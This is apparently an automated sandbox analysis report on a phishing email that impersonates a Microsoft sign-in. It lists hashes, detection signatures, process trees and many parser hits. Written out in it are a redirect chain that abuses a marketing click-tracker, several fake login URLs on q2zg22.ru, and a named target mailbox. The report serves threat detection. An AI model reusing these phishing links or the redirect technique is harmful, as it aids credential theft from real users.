Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dudick SystemDesk Important Crediential Notification 1.eml

Overview

General Information

Sample name:dudick SystemDesk Important Crediential Notification 1.eml
Analysis ID:1385782
MD5:b11651fa3218ada5b9c92f80dc55d4a5
SHA1:13c2d5e404240206771d5488d1ae018ebb66689f
SHA256:f276abeda2d8eed011c41849e7808be1417f8d093cdf951ff45005a5b57bf64f
Infos:

Detection

HTMLPhisher
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish54
Yara detected HtmlPhish62
Yara detected Phisher
Phishing site detected (based on image similarity)
Phishing site detected (based on logo match)
Creates files inside the system directory
Detected hidden input values containing email addresses (often used in phishing pages)
Found iframes
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 4412 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\dudick SystemDesk Important Crediential Notification 1.eml MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 6056 cmdline: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "4D284E4F-3A7D-4622-868A-062F51C2E027" "7456C4E0-F4FD-42C9-A562-F537B3C4256C" "4412" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6544 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 5716 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=2072,i,10138071190065889849,3391501485592805015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3700 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 3104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=2008,i,13169059896536106163,9047257998414387997,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niit#c2FsZXNAZHVkaWNrLmNvbQ== MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7016 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1616 --field-trial-handle=1988,i,16673131194630306312,13924574274350384022,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_105JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    SourceRuleDescriptionAuthorStrings
    1.1.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      1.1.pages.csvJoeSecurity_HtmlPhish_62Yara detected HtmlPhish_62Joe Security
        2.2.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          2.6.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
            2.7.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
              Click to see the 2 entries
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 4412, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
              No Snort rule has matched

              Click to jump to signature section

              Show All Signature Results

              Phishing

              barindex
              Source: https://q2zg22.ruMatcher: Template: microsoft matched with high similarity
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=Matcher: Template: microsoft matched with high similarity
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comMatcher: Template: microsoft matched with high similarity
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comMatcher: Template: microsoft matched with high similarity
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: 2.2.pages.csv, type: HTML
              Source: Yara matchFile source: 2.6.pages.csv, type: HTML
              Source: Yara matchFile source: 2.7.pages.csv, type: HTML
              Source: Yara matchFile source: 3.4.pages.csv, type: HTML
              Source: Yara matchFile source: 6.10.pages.csv, type: HTML
              Source: Yara matchFile source: 1.1.pages.csv, type: HTML
              Source: Yara matchFile source: dropped/chromecache_105, type: DROPPED
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=Matcher: Found strong image similarity, brand: MICROSOFT
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHomMatcher: Template: microsoft matched
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHomMatcher: Template: microsoft matched
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHomMatcher: Template: microsoft matched
              Source: https://ywnjb.q2zg22.ru/Me.htm?v=3Matcher: Template: microsoft matched
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=Matcher: Template: microsoft matched
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=Matcher: Template: microsoft matched
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHomMatcher: Template: microsoft matched
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=Matcher: Template: microsoft matched
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmgiDPuF7RBPuj5SL3QM3C4M1Kh06FbCzoMkifzVJpPWCAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.comHTTP Parser: sales@dudick.com
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: Iframe src: https://ywnjb.q2zg22.ru/Me.htm?v=3
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: Iframe src: https://ywnjb.q2zg22.ru/Me.htm?v=3
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: Number of links: 0
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: Number of links: 0
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: Number of links: 0
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=HTTP Parser: Title: Sign in to your account does not match URL
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: Title: Sign in to your account does not match URL
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNm...HTTP Parser: Title: Sign in to your Microsoft account does not match URL
              Source: https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comHTTP Parser: Title: Sign in to your account does not match URL
              Source: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBu...HTTP Parser: Title: Sign in to your Microsoft account does not match URL
